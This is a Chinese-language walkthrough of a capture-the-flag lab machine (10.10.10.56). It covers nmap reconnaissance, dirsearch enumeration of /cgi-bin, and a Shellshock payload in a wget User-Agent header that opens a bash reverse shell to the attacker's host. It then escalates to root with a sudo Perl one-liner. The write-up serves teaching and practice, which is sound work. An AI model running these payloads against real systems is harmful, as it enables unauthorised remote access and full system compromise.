ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的高危漏洞，shellshock于2014年9月24日首次被公开，在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bash执行任意shell命令。

0x01 信息收集-reconnaissance

首先利用nmap进行信息收集

nmap -sC -sV -A -v 10.10.10.56

┌──(root㉿Oscp-Ielts)-[~]
└─# nmap -sC -sV -A -v 10.10.10.56
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 21:44 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:44
Completed NSE at 21:44, 0.00s elapsed
Initiating NSE at 21:44
Completed NSE at 21:44, 0.00s elapsed
Initiating NSE at 21:44
Completed NSE at 21:44, 0.00s elapsed
Initiating Ping Scan at 21:44
Scanning 10.10.10.56 [4 ports]
Completed Ping Scan at 21:44, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:44
Completed Parallel DNS resolution of 1 host. at 21:44, 0.01s elapsed
Initiating SYN Stealth Scan at 21:44
Scanning localhost (10.10.10.56) [1000 ports]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
Completed SYN Stealth Scan at 21:44, 2.42s elapsed (1000 total ports)
Initiating Service scan at 21:44
Scanning 2 services on localhost (10.10.10.56)
Completed Service scan at 21:45, 6.50s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against localhost (10.10.10.56)
Retrying OS detection (try #2) against localhost (10.10.10.56)
Retrying OS detection (try #3) against localhost (10.10.10.56)
Retrying OS detection (try #4) against localhost (10.10.10.56)
Retrying OS detection (try #5) against localhost (10.10.10.56)
Initiating Traceroute at 21:45
Completed Traceroute at 21:45, 0.25s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:45
Completed Parallel DNS resolution of 1 host. at 21:45, 0.01s elapsed
NSE: Script scanning 10.10.10.56.
Initiating NSE at 21:45
Completed NSE at 21:45, 7.08s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.99s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Nmap scan report for localhost (10.10.10.56)
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=4/30%OT=80%CT=1%CU=44484%PV=Y%DS=2%DC=T%G=Y%TM=644F19B
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M53CST11NW6%O2=M53CST11NW6%O3=M53CNNT11NW6%O4=M53CST11NW6%O5=M53CST11
OS:NW6%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M53CNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Uptime guess: 0.398 days (since Sun Apr 30 12:12:19 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   244.17 ms localhost (10.10.14.1)
2   244.24 ms localhost (10.10.10.56)

NSE: Script Post-scanning.
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.84 seconds
Raw packets sent: 1220 (57.738KB) | Rcvd: 1131 (48.770KB)

根据nmap的扫描结果可知，该目标主机有2个开放的常用端口，分别是80提供http服务和22提供的ssh服务。

访问http://10.10.10.56,结果如下图所示：

因为没有在首页找到我们需要的有效信息，因此需要尝试进一步用dirsearch进行目录枚举，执行命令如下：

python3 dirsearch.py -u 10.10.10.56 --url-list=/usr/share/wordlists/dirbuster/director-list-2.3-medium.txt -e default

扫描完成后，结果如下：

发现了/cgi-bin目录以及/server-status/目录，根据经验，其中/cgi-bin/目录下常常会有一些.sh、.pl以及.cgi等格式的可执行脚本，因此执行命令：python3 dirsearch.py -u 10.10.10.56/cgi-bin --url-list=/usr/share/wordlists/dirbuster/director-list-2.3-medium.txt -e sh,pl，结果如下：

漏洞利用：/cgi-bin/目录下的.sh脚本文件

访问http://10.10.10.56/cgi-bin/user.sh，结果如图所示，触发user.sh文件下载。

user.sh文件内容如下图所示，此文件是uptime命令的执行结果，uptime命令是一个非常典型的基于bash shell执行的系统命令。如果多次访问http://10.10.10.56/cgi-bin/user.sh，发现每次文件的内容会随着时间的变化而变化，因此可以知道下载uptime命令都是是时执行并返回结果的。

0x02

漏洞利用-Shellshock漏洞的POC测试

根据user.sh文件内容的特性，即通过一个bash shell终端来实时地执行uptime命令，并通过下载文件的方式来执行结果。所以，我们可以判断http://10.10.10.56/cgi-bin/user.sh里面的数据，从而推出该脚本可能存在Shellshock漏洞

于是开始测试ShellShock的payload

wget -qO- -U "() { :;}; echo Content-Type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.7/8888 0>&1" http://10.10.10.56/cgi-bin/user.sh

其中10.10.14.7为kali主机，8888端口为kali主机的监听端口

可见，目标主机的shel成功反弹在kali的8888端口上。

cd /home/shelly下的user.txt,成功获取users权限。

漏洞利用-本地脆弱性：sudo权限

大家都知道，Perl和Python是类似的脚本语言，Perl可以以root身份运行，那么我们可以轻松的利用Perl代码通过构建反弹shell的命令或执行系统命令开启新终端来获取root权限。

sudo /usr/bin/perl -e 'exec "/bin/sh"' ，命令执行结果如下：

可以看到通过执行Perl脚本，在Shelly用户权限的反弹shelll窗口中重新建立一个root权限的反弹shell。

0x03总结

在本次靶机实战中，通过dirsearch搜集目录发现user.sh文件，发现该文件调用一个bash shell终端来实时地执行uptime命令，并通过下载文件的形式返回结果，因此猜测可能是Shellshock漏洞，之后的poc测试证明确实是Shellshock，之后又通过Perl和ptyhon的脚本特性成功拿到目标主机的root权限。